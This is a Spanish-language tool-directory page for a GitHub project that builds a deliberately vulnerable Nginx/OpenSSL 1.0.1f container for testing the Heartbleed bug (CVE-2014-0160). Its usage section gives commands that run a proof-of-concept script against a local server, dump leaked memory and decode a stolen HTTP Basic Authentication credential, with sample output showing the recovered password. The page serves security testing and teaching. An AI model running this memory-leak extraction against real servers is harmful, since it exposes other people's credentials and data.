Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Heartbleed_Dockerfile_with_Nginx — Dockerfile para probar la explotación de Heartbleed CVE-2014-0160. | Kitploit
Herramientas/GitHubGitHub/froyo75/heartbleed_dockerfile_with_nginx
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubfroyo75/heartbleed_dockerfile_with_nginx

Heartbleed_Dockerfile_with_Nginx

Dockerfile para probar la explotación de Heartbleed CVE-2014-0160.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
1hace 4 añosAún no revisado

Probando Heartbleed con Dockerfile de Nginx

Este repositorio contiene el Dockerfile de Nginx con la versión vulnerable OpenSSL (1.0.1f) para probar la vulnerabilidad CVE-2014-0160 Heartbleed.

Imagen Base Docker

  • debian:latest

Instalación

  1. Instala Docker

    • Ejemplo con Debian: apt-get install -y docker
  2. Descarga la imagen base de Debian desde el Docker Hub Registry público: docker pull debian:latest

  3. Construye la imagen desde el Dockerfile: docker build -t heartbleed_nginx_img .

Uso

Iniciar el contenedor Heartbleed+Nginx

docker run -i -t -p 1500:443 heartbleed_nginx_img

Probar la vulnerabilidad Heartbleed (CVE-2014-0160) con el método de Autenticación Básica HTTP
  1. Descarga el script Python Heartbleed-poc (¡Solo para fines de prueba!). Esta es una versión modificada originalmente por Jared Stafford [email protected]. Gracias a SensePost por este script.

  2. Abre dos nuevas pestañas en tu terminal actual y ejecuta:

    • Primera pestaña (Generando x100 solicitudes GET usando Autenticación Básica HTTP con el comando curl):

      for loop in {0..100..1}; do curl -X GET -s -i -k -u admin:myP@ssword0MG https://127.0.0.1:1500| grep -E "200"; done

      HTTP/1.1 200 OK HTTP/1.1 200 OK HTTP/1.1 200 OK HTTP/1.1 200 OK snipp...

    • Segunda pestaña (Generando x100 solicitudes de Heartbeat (-n 100) y escribiendo el volcado de memoria en el archivo "dump.bin", luego obteniendo el resultado del campo "Authorization" del volcado de memoria y finalmente decodificando la cadena de resultado Base64 a texto plano en claro ^^):

      python heartbleed-poc.py -f dump.bin -q -n 100 -p 1500 127.0.0.1 && grep -a "^Authorization:" dump.bin | head -n1 | awk -F " " '{print $3}' | tr -d '\n\r' | base64 --decode && echo

      WARNING: server 127.0.0.1 returned more data than it should - server is vulnerable! ... received message: type = 22, ver = 0302, length = 66 ... received message: type = 22, ver = 0302, length = 925 ... received message: type = 22, ver = 0302, length = 331 ... received message: type = 22, ver = 0302, length = 4 ... received message: type = 24, ver = 0302, length = 16384 WARNING: server 127.0.0.1 returned more data than it should - server is vulnerable! snipp... admin:myP@ssword0MG

Descargar herramienta